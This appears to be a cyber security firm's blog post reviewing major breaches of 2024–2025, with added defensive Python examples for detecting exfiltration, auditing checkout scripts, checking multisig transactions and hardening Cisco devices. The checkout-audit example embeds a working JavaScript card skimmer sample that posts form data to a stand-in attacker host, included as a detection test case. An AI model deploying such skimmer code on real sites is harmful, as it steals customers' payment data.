March 14, 2025
Take a Look at The Cyber Threat Landscape in 2025 (So Far)
Cyberattacks in 2025 are evolving at an unprecedented pace. With cybercriminals leveraging AI, automation and sophisticated hacking techniques, businesses face an increasingly complex threat landscape.
Recent high-profile breaches, including attacks on government institutions, financial entities and technology firms, highlight the growing risks.
At CyberOne, we believe security is not just about reacting to threats but also about resilience—ensuring businesses can operate securely and efficiently without disruption. Many organisations turn to large consultancies for cyber security, but bigger isn’t always better: what matters is being big enough to work proactively and to respond effectively when an incident occurs.
With 20 years in the industry, CyberOne has the agility of a start-up combined with the expertise and reliability of a seasoned cyber security provider. As a CREST-certified SOC, Cyber Incident Response and Penetration Testing provider and an NCSC Cyber Incident Response Assured Service Provider, we adhere to the highest standards in security operations. Our ISO 27001 certification backs this up to ensure robust data protection.
Here, we explore the state of cyberattacks in 2025, the most significant breaches shaping the industry and how businesses can protect themselves with strategic cyber security measures.
The Most Notable Cyberattacks of 2025

In early 2025, the Sarcoma ransomware group, a relatively new but aggressive threat actor, claimed responsibility for a cyberattack on Unimicron, a leading Taiwanese printed circuit board (PCB) manufacturer. The attackers allege they exfiltrated 377GB of SQL files and sensitive documents and have threatened to leak the data if a ransom is not paid.
The breach highlights the increasing risk of ransomware attacks targeting manufacturing and supply chain companies, where operational disruptions can have widespread downstream effects on global technology production.
Cyber Security Issues Identified
- Targeting of Critical Supply Chains — Attackers focus on high-value manufacturing targets where disruptions can impact global electronics production.
- Mass Data Exfiltration — 377GB of stolen data suggests weak data loss prevention (DLP) and inadequate monitoring of sensitive information.
- Ransomware and Extortion Tactics — Attackers leverage public data leaks as additional pressure to force payment, making it harder for companies to recover quietly.
- Vulnerabilities in Industrial IT Infrastructure — The breach indicates potential security gaps in Unimicron’s network segmentation and threat detection capabilities.
Key Security Learnings
- Manufacturing and supply chain companies are becoming primary ransomware targets as attackers seek to disrupt operations and demand high-value ransoms.
- Implementing proactive DLP, network segmentation, and continuous threat monitoring is essential to prevent data exfiltration and limit attack impact.
Security Challenge
💡 If ransomware operators exfiltrated and threatened to leak your company’s sensitive data, would you have the controls in place to detect, contain, and respond before it’s too late?
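What continuous egress monitoring looks like in practice, as an added example that is not part of the original article and not CyberOne's tooling: the script below aggregates outbound bytes per internal host and destination from a constructed proxy log (sample data, nothing from the Unimicron incident) and alerts when the total crosses an assumed 1 GiB threshold or the destination is not on an assumed allowlist. A 377GB transfer would dwarf that threshold; the point is that the two signals together separate a bulk upload to an unknown host from routine traffic.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample proxy log (not real data). Fields:
# timestamp  source-host  destination-host  bytes-sent-by-client
SAMPLE_LOG = """\
2025-02-01T02:10:05Z ws-eng-17 update.vendor.example 2048
2025-02-01T02:11:30Z ws-eng-17 files.collab.example 512000
2025-02-01T02:12:01Z srv-db-02 storage.unknown-host.example 734003200
2025-02-01T02:13:44Z srv-db-02 storage.unknown-host.example 812000000
2025-02-01T02:15:09Z ws-fin-03 mail.example 90000
2025-02-01T02:16:22Z srv-db-02 storage.unknown-host.example 655360000
2025-02-01T02:18:40Z ws-fin-03 cdn.new-vendor.example 4096
"""

# Assumed allowlist of destinations this site is expected to upload to.
KNOWN_DESTINATIONS = {"update.vendor.example", "files.collab.example", "mail.example"}
# Assumed threshold: 1 GiB outbound from one host to one destination in the window.
OUTBOUND_THRESHOLD_BYTES = 1024 ** 3


def parse_log(text):
    """Parse the simple space-separated format above into (time, src, dst, bytes)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, sent = line.split()
        when = datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)
        events.append((when, src, dst, int(sent)))
    return events


def detect_exfiltration(events, threshold=OUTBOUND_THRESHOLD_BYTES, known=KNOWN_DESTINATIONS):
    """Aggregate outbound bytes per (source, destination) and raise alerts.

    Two signals are combined: total volume over the threshold, and a
    destination not on the allowlist. Either alone is worth a look; both
    together is the classic bulk-exfiltration picture.
    """
    totals = defaultdict(int)
    first_seen = {}
    for when, src, dst, sent in events:
        key = (src, dst)
        totals[key] += sent
        first_seen.setdefault(key, when)

    alerts = []
    for (src, dst), total in totals.items():
        reasons = []
        if total >= threshold:
            reasons.append(f"{total / 1024 ** 3:.2f} GiB outbound")
        if dst not in known:
            reasons.append("destination not on allowlist")
        if not reasons:
            continue
        alerts.append({
            "source": src,
            "destination": dst,
            "bytes": total,
            "severity": "high" if len(reasons) == 2 else "low",
            "reasons": reasons,
            "first_seen": first_seen[(src, dst)].isoformat(),
        })
    # Highest volume first so an analyst sees the bulk transfer at the top.
    alerts.sort(key=lambda a: a["bytes"], reverse=True)
    return alerts


if __name__ == "__main__":
    for alert in detect_exfiltration(parse_log(SAMPLE_LOG)):
        print(alert["severity"].upper(), alert["source"], "->", alert["destination"],
              "; ".join(alert["reasons"]))
```

Run it against a real proxy or NetFlow export by replacing SAMPLE_LOG with the parsed records; the threshold should come from the site's observed baseline per host class, because a database server uploading anything at all to an unknown host is itself the anomaly.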

Southern Water, a major UK water supplier, was hit by the Black Basta ransomware group in early 2024; it has since disclosed £4.5 million ($5.7 million) in direct costs from the incident, covering response, recovery and security improvements. While the full operational impact remains undisclosed, the figure underscores the financial and operational risks that critical infrastructure providers face when targeted by ransomware.
As essential services become prime targets, the ability to respond swiftly and recover efficiently is crucial to minimizing financial losses and public disruption.
Cyber Security Issues Identified
- Critical Infrastructure at Risk — Water, energy, and other essential service providers remain high-value ransomware targets due to their low tolerance for downtime.
- Significant Financial Impact — Even without paying a ransom, Southern Water incurred millions in response, recovery, and security enhancements.
- Operational Disruptions — While details remain limited, ransomware attacks on utilities can affect billing systems, customer services, and even water supply operations.
- Recovery & Resilience Gaps — The high cost of response suggests limitations in Southern Water’s existing incident response and business continuity planning.
Key Security Learnings
- Ransomware attacks on critical infrastructure can lead to massive financial and operational consequences, even without direct service outages.
- Proactive investment in cyber security, incident response, and resilience strategies can significantly reduce recovery costs and downtime.
Security Challenge
💡 If your organization suffered a ransomware attack today, would your incident response plan minimize financial losses and ensure rapid recovery?

Between January 14 and 24, 2025, the Casio UK online store (casio.co.uk) was compromised by attackers who injected a malicious script into the checkout flow to capture customer payment information. Any customer who made a purchase during this period may have had their card details and personal data stolen.
This type of attack, commonly called a Magecart or web skimming attack, highlights the ongoing risks e-commerce businesses face when processing customer transactions online.
Cyber Security Issues Identified
- E-Commerce Payment Fraud — Attackers targeted checkout pages to intercept credit card data, exploiting security gaps in web applications.
- Supply Chain Vulnerabilities — Malicious scripts are often injected through third-party services or outdated website components.
- Delayed Detection & Response — The attack went undetected for 10 days, putting thousands of customers at risk.
- Customer Data & Compliance Risks — The theft of personal and financial data raises concerns about GDPR violations and reputational damage.
Key Security Learnings
- E-commerce businesses must continuously monitor their web applications for malicious scripts to prevent customer data theft.
- Regular security assessments and PCI DSS compliance audits help strengthen payment security and detect vulnerabilities before they are exploited.
Security Challenge
💡 If attackers injected malicious code into your online store today, how long would it take for you to detect and stop the theft of customer payment data?
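One way to monitor a checkout page for injected scripts, as an added example (not code from the original article, from Casio, or from the researchers who found the skimmer): the script parses a page's `<script>` tags, compares external sources against an assumed allowlist of hosts and inline bodies against SHA-256 hashes of known-good scripts, and flags unlisted inline scripts that both read form fields and send data out, which is the behaviour any Magecart skimmer needs. The checkout HTML and the allowlist are constructed for the example.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed baseline for the store: hosts allowed to serve scripts, and the
# known-good inline scripts (hashed below). Anything else is a finding.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}
GOOD_INLINE_SCRIPTS = [
    "window.checkoutConfig = {currency: 'GBP', step: 'payment'};",
]

# Heuristic for skimmer behaviour: reads form fields AND sends data somewhere.
READS_FORMS = re.compile(r"(document\.forms|querySelector(All)?\(\s*['\"]input|\.value\b)")
SENDS_DATA = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(|\.src\s*=)")


def inline_hash(body):
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, good_inline=GOOD_INLINE_SCRIPTS):
    """Return a list of findings for scripts that deviate from the baseline."""
    baseline_hashes = {inline_hash(s) for s in good_inline}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            host = urlparse(src).hostname or ""
            if host not in allowed_hosts:
                findings.append({"kind": "external_script_unlisted", "detail": src})
            continue
        digest = inline_hash(body)
        if digest in baseline_hashes:
            continue
        kind = "inline_script_unlisted"
        if READS_FORMS.search(body) and SENDS_DATA.search(body):
            kind = "inline_skimmer_pattern"
        findings.append({"kind": kind, "detail": digest[:16]})
    return findings


# Constructed checkout page: two legitimate scripts plus two injected ones
# (an off-site loader and an inline skimmer). Not taken from casio.co.uk.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script>window.checkoutConfig = {currency: 'GBP', step: 'payment'};</script>
<script src="https://static.evil-cdn.example/jquery.min.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>
document.querySelector('#payment').addEventListener('submit', function () {
  var out = {};
  document.querySelectorAll('input').forEach(function (i) { out[i.name] = i.value; });
  navigator.sendBeacon('https://collect.evil-cdn.example/c', JSON.stringify(out));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_CHECKOUT_HTML):
        print(f["kind"], f["detail"])
```

The same baseline can be enforced in the browser with Subresource Integrity for external scripts and a Content Security Policy using script-src hashes or nonces; the audit script is for catching drift from that baseline when the CMS, a plugin, or an attacker changes what the server actually sends.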

British engineering firm Smiths Group reported a cybersecurity incident involving unauthorized access to its systems, leading to a drop in its stock price by 2.3% in early trading. While details on the attack remain limited, the breach highlights the financial, operational, and reputational risks companies in the engineering and manufacturing sectors face when targeted by cybercriminals.
As critical industries become more digitized, intellectual property, supply chain systems, and operational technology (OT) infrastructure are increasingly at risk.
Cyber Security Issues Identified
- Unauthorized System Access — No details of the initial vector were disclosed; credential theft, an insider, or an external intrusion through an exposed service are all plausible.
- Financial & Market Impact — The breach caused immediate stock price volatility, showing how cyber security risks can directly affect investor confidence.
- Threats to Engineering & Manufacturing IP — The attack may have exposed sensitive designs, R&D data, or proprietary systems, making the firm a target for corporate espionage.
- Operational Disruption Risks — If left unchecked, cyberattacks on engineering firms can impact supply chains, project timelines, and industrial control systems (ICS).
Key Security Learnings
- Unauthorized access incidents can quickly escalate into financial, reputational, and operational crises if not contained early.
- Engineering firms must secure their intellectual property, strengthen identity and access controls, and monitor for unauthorized system activity.
Security Challenge
💡 If attackers gained unauthorized access to your systems today, how quickly could you detect, contain, and prevent damage to your business operations and reputation?

In December 2024, Chinese state-sponsored attackers gained access to unclassified documents and workstations at the U.S. Department of the Treasury through a third-party service: a key used by BeyondTrust’s cloud-based remote support product was compromised, giving the attackers a trusted path into Treasury systems.
The attackers remained undetected for weeks, raising concerns about nation-state cyber espionage and the security of government infrastructure.
Cyber Security Issues Identified
- Supply Chain Vulnerabilities — A compromised key for a vendor’s remote support service was the entry point; the vendor’s access was trusted as if it were Treasury’s own.
- Insufficient Endpoint Security — Compromised devices were controlled remotely.
- Prolonged Dwell Time — The breach went unnoticed for several weeks, indicating weak monitoring.
Key Security Learnings
State-sponsored attacks are becoming more frequent, making real-time threat detection and continuous monitoring critical. CyberOne’s Microsoft Threat Protection Engagement identifies vulnerabilities and strengthens defences against advanced cyber threats.
Security Challenge
💡Are you confident that third-party software in your environment isn’t exposing you to unseen risks?

In mid-2023, a zero-day SQL injection vulnerability (CVE-2023-34362) in Progress Software’s MOVEit Transfer file transfer product led to one of the largest data-theft campaigns on record, affecting thousands of organisations and nearly 100 million individuals. The Russian-linked Cl0p extortion group exploited the flaw to steal data from internet-facing MOVEit servers and leaked it when victims refused to pay; downstream breach notifications continued long after the initial campaign, as victims discovered their data had been held by compromised vendors.
Cyber Security Issues Identified
- Zero-Day Exploitation — The attack targeted a previously unknown vulnerability.
- Supply Chain Weaknesses — Multiple organisations using MOVEit were compromised.
- Slow Patching — Progress published a fix within days of the exploitation being discovered, but many organisations left exposed MOVEit servers unpatched for weeks afterwards, and further MOVEit vulnerabilities followed in June 2023.
Key Security Learnings
Regular vulnerability assessments and rapid patching are essential. CyberOne’s Microsoft Secure Score Rapid Remediation service helps organisations prioritise and fix critical security gaps.
Security Challenge
💡How quickly are you applying security patches and do you have a process to detect vulnerabilities before attackers do?

In October 2023, the Rhysida ransomware group attacked the British Library, demanding a ransom of 20 Bitcoin. When the organisation refused to pay, the attackers leaked around 600GB of stolen data, and the disruption to library services lasted for months. The attack impacted access to digital resources, internal systems and critical research archives, highlighting the vulnerability of public institutions and cultural organisations to cyber threats.
Cyber Security Issues Identified
- Unprotected Critical Infrastructure — The ransomware attack impacted core services, suggesting insufficient segmentation of critical systems.
- Lack of Proactive Threat Detection — The breach went undetected until systems were encrypted, indicating weak endpoint monitoring and threat response.
- No Ransom Payment, No Data Recovery — The organisation had to rely on backups and manual recovery efforts without a decryption key.
- Sensitive Data Exposure — Leaked information may include employee and operational records, raising potential compliance and privacy concerns.
Key Security Learnings
Ransomware remains a top threat and no public or private industry is immune. Data protection, segmentation and rapid incident response are crucial to minimising downtime and operational disruptions.
Security Challenge
💡If ransomware locked your organisation’s critical systems today, how quickly could you detect, contain and recover?

On 21 February 2025, the Lazarus Group, a North Korean state-backed hacking unit, stole roughly $1.5 billion in Ether and Ether derivatives from the Bybit cryptocurrency exchange. The attackers did not break Bybit’s cold wallet directly: they compromised a developer machine at Safe{Wallet}, the multisignature wallet provider Bybit used, and injected malicious JavaScript into the wallet’s web interface. When Bybit’s signers approved a routine cold-to-warm wallet transfer, the interface showed them the expected transaction while the data they actually signed changed the wallet contract’s logic and handed control to the attackers. The funds were then swapped and moved across multiple chains and services, making tracing and recovery extremely difficult. The attack shows how a trusted signing interface becomes a single point of failure, even when the private keys themselves are never stolen.
Cyber Security Issues Identified
- Manipulated Signing Interface — Signers approved what the wallet UI displayed, not what the transaction actually did, so the multisig protection was bypassed without any key being compromised.
- Detection After the Fact — The theft was identified only once the funds had moved, indicating no independent, real-time check of outgoing transactions against their expected parameters.
- Cross-Border Laundering Techniques — Stolen cryptocurrency was rapidly converted into multiple assets and moved across chains, making tracking difficult for investigators.
- Supply Chain Exposure — The compromise of the wallet provider’s developer environment shows that third-party infrastructure in the signing path must be in scope for zero-trust controls, not treated as implicitly trusted.
Key Security Learnings
Financial institutions and crypto platforms remain prime targets for the most capable state-backed groups. Verifying each transaction independently of the signing interface (for example, checking the destination and operation on the hardware wallet’s own display against an out-of-band copy), combined with AI-driven, real-time anomaly detection on outgoing transactions, is essential to catching unauthorised transfers before they settle.
Security Challenge
💡Would your current fraud detection and access controls prevent attackers from making unauthorised financial transactions?
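A pre-signing policy check for a multisig transaction, as an added example that is not Bybit’s or Safe’s code: the transaction fields (to, value, data, operation) follow the Safe convention in which operation 1 means delegatecall, and the policy values and addresses are illustrative assumptions. The transaction Bybit’s signers approved carried zero value, custom calldata and a delegatecall to an unapproved contract; each of those trips a rule here regardless of what a compromised web interface displayed. The fingerprint function is a simplified stand-in for the wallet’s real transaction hash, so that signers can compare what they are about to sign out of band.

```python
import hashlib
import json

CALL, DELEGATECALL = 0, 1

# Assumed operational policy for a cold-to-warm transfer (illustrative values,
# not Bybit's real addresses or limits).
POLICY = {
    "approved_destinations": {"0x" + "11" * 20},   # the warm wallet
    "max_value_wei": 50_000 * 10**18,              # 50,000 ETH per transaction
    "allow_delegatecall": False,                   # never for a treasury wallet
}


def tx_fingerprint(tx):
    """Stable hash of the fields that determine what a transaction does.

    Each signer computes this independently (ideally on a device that does
    not trust the web UI) and compares it with the other signers out of band.
    This is a simplified stand-in, not Safe's EIP-712 safeTxHash.
    """
    canonical = json.dumps(
        {"to": tx["to"].lower(), "value": int(tx["value"]),
         "data": tx["data"].lower(), "operation": int(tx["operation"])},
        sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()


def check_transaction(tx, policy=POLICY):
    """Return (ok, reasons). Any reason means: do not sign."""
    reasons = []
    approved = {a.lower() for a in policy["approved_destinations"]}
    if tx["operation"] == DELEGATECALL and not policy["allow_delegatecall"]:
        reasons.append("delegatecall would run foreign code against the wallet's own storage")
    if tx["to"].lower() not in approved:
        reasons.append(f"destination {tx['to']} is not an approved wallet")
    if int(tx["value"]) > policy["max_value_wei"]:
        reasons.append("value exceeds per-transaction limit")
    if tx["data"].lower() not in ("", "0x"):
        reasons.append("a plain transfer should carry no calldata")
    return (not reasons, reasons)


# Constructed examples. The second mirrors the shape of the Bybit transaction:
# zero value, calldata, and operation=1, aimed at an unapproved contract.
ROUTINE_TRANSFER = {
    "to": "0x" + "11" * 20,
    "value": 30_000 * 10**18, "data": "0x", "operation": CALL,
}
MALICIOUS_UPGRADE = {
    "to": "0x" + "22" * 20,
    "value": 0, "data": "0xdeadbeef" + "00" * 64, "operation": DELEGATECALL,
}

if __name__ == "__main__":
    for name, tx in [("routine", ROUTINE_TRANSFER), ("malicious", MALICIOUS_UPGRADE)]:
        ok, reasons = check_transaction(tx)
        print(name, tx_fingerprint(tx)[:16], "SIGN" if ok else "REFUSE", reasons)
```

The rules are deliberately dumb and deterministic: a signer who can only see what the UI renders needs a second, UI-independent opinion, and a policy engine running on a separate machine (or the checks built into a hardware signer) gives exactly that.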

On 10 March 2025, X (formerly Twitter) suffered widespread outages that its owner, Elon Musk, attributed to a massive cyberattack, saying it was carried out by either a large, coordinated group or a nation-state.
The Dark Storm hacktivist group, a pro-Palestinian collective active since 2023, claimed responsibility. The outages were caused by large-scale DDoS (Distributed Denial-of-Service) traffic that overwhelmed X’s infrastructure; the company responded by putting emergency protection from Cloudflare in front of the affected services, including CAPTCHA challenges for suspicious traffic.
Cyber Security Issues Identified
- DDoS Resilience Gaps — X suffered prolonged outages, suggesting insufficient mitigation measures for large-scale, resource-intensive attacks.
- Escalating Hacktivist Threats — Politically motivated groups increasingly target critical online platforms with high-impact cyberattacks.
- Real-Time Response Challenges — The attack required immediate intervention, underscoring the need for automated DDoS mitigation and rapid security adjustments.
- Reliance on Cloudflare for Emergency Protection — Reports that X had to move its defences to Cloudflare mid-attack suggest its standing DDoS protections were not sufficient for traffic on this scale.
Key Security Learnings
- Hacktivist groups are evolving attack methods, leveraging botnets and automation to disrupt global platforms.
- Organisations must implement proactive DDoS protection to ensure uptime and resilience during large-scale attacks.
Security Challenge
💡 If your organisation was targeted by a large-scale DDoS attack today, could you maintain business operations, or would service disruptions leave you vulnerable?

Between December 2024 and January 2025, the Chinese state-sponsored group Salt Typhoon (tracked by Recorded Future’s Insikt Group as RedMike) ran a large-scale campaign against telecommunications providers and universities, attempting to exploit more than 1,000 Cisco network devices, over half of them in the U.S., South America and India. The attackers used two vulnerabilities in the Cisco IOS XE web UI that had been patched in October 2023: CVE-2023-20198, which lets an unauthenticated attacker who can reach the web interface create a privilege-15 account, and CVE-2023-20273, which escalates from that account to root on the device.
According to the same researchers, more than 12,000 Cisco devices with web interfaces exposed to the internet remain at risk, highlighting the urgent need for patching, for disabling or restricting the web UI, and for stronger network security measures.
Cyber Security Issues Identified
- Unpatched Network Devices — The attackers exploited Cisco IOS XE devices still running code vulnerable to flaws fixed more than a year earlier, showing the risk of delayed security updates on network infrastructure.
- Widespread Telecom Compromise — More than 1,000 breached devices indicate a coordinated attack on global telecom providers.
- State-Sponsored Cyber Espionage — Salt Typhoon’s campaign aligns with nation-state intelligence gathering efforts, potentially affecting critical communications infrastructure.
- Lack of Network Visibility & Hardening — The number of internet-exposed Cisco devices (12,000+) suggests poor perimeter security and inadequate device monitoring.
Key Security Learnings
- Unpatched network infrastructure remains a top target for cyber espionage—telecom providers must prioritize vulnerability management and proactive patching.
- Implementing zero-trust security, segmenting networks, and monitoring for unauthorized access can prevent attackers from exploiting critical telecom infrastructure.
Security Challenge
💡 Are outdated or unpatched network devices in your environment exposing your organization to state-sponsored cyber threats?
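An audit of the conditions this campaign relied on, as an added example (not Cisco’s or Recorded Future’s tooling): CVE-2023-20198 needs the IOS XE web UI reachable by the attacker, and successful exploitation leaves a new privilege-15 local account in the running config. The script checks a constructed `show running-config` extract for an enabled HTTP/HTTPS server with no access-class ACL and for privilege-15 accounts outside an assumed approved set; the rogue account name in the sample mimics the kind of name Cisco Talos reported being created during exploitation, and the password hashes are placeholders. A hardened version of the same config is included to show the audit passing.

```python
import re

# Assumed set of accounts that are supposed to hold privilege 15 on the edge routers.
APPROVED_PRIV15_USERS = {"netops"}


def audit_ios_xe_webui(config, approved_users=APPROVED_PRIV15_USERS):
    """Check a running-config for the conditions CVE-2023-20198/20273 needed."""
    lines = [l.strip() for l in config.splitlines()]
    findings = []

    http_on = "ip http server" in lines
    https_on = "ip http secure-server" in lines
    acl_applied = any(l.startswith("ip http access-class") for l in lines)

    if http_on:
        findings.append("web UI reachable over plain HTTP (ip http server): disable it")
    if https_on and not acl_applied:
        findings.append("HTTPS web UI enabled with no 'ip http access-class' ACL: "
                        "restrict to management hosts or disable")

    # Accounts created through the web UI exploit show up as privilege-15 users.
    priv15 = re.compile(r"^username (\S+) privilege 15\b")
    for l in lines:
        m = priv15.match(l)
        if m and m.group(1) not in approved_users:
            findings.append(f"unexpected privilege-15 account: {m.group(1)}")
    return findings


# Constructed sample, not a real device. The extra account name mimics the
# kind of account Cisco Talos reported being created during exploitation;
# the secret hashes are placeholders.
VULNERABLE_CONFIG = """
version 17.3
hostname edge-rtr-01
!
username netops privilege 15 secret 9 $9$placeholderhash
username cisco_tac_admin privilege 15 secret 9 $9$placeholderhash
!
ip http server
ip http secure-server
!
"""

# The same device after remediation: web UI off, rogue account removed.
HARDENED_CONFIG = """
version 17.3
hostname edge-rtr-01
!
username netops privilege 15 secret 9 $9$placeholderhash
!
no ip http server
no ip http secure-server
!
"""

if __name__ == "__main__":
    for name, cfg in [("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)]:
        print(name, audit_ios_xe_webui(cfg) or ["no findings"])
```

Version checking against Cisco’s fixed releases is deliberately left out; use the Cisco Software Checker for that. Where the web UI is genuinely needed, `ip http access-class` with a management-only ACL is the minimum; otherwise `no ip http server` and `no ip http secure-server`, and treat any privilege-15 account you did not create as an incident, not a cleanup item.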
CyberOne: Your Trusted Cyber Security Partner
In an era of relentless and increasingly sophisticated cyber threats, organisations need more than tools—they need a trusted partner to help them assess, strengthen and maintain their security posture. CyberOne combines deep Microsoft expertise, industry-leading accreditations and a proven track record of securing mission-critical environments.
Get Your Free Cyber Security Review
Understanding your Microsoft Secure Score is crucial in identifying and remediating vulnerabilities before attackers exploit them. CyberOne’s Secure Score Rapid Remediation service helps organisations identify and close security gaps, reducing vulnerabilities before they can be exploited.
After your Secure Score review, CyberOne can support your security journey with:
- Professional Services — Cyber risk assessments, penetration testing and compliance-driven security optimisation.
- Managed Security Services — 24×7 threat detection, response and continuous security management.
Book a free 1:1 session with CyberOne to review your Secure Score, uncover security gaps and receive actionable recommendations for improving your resilience.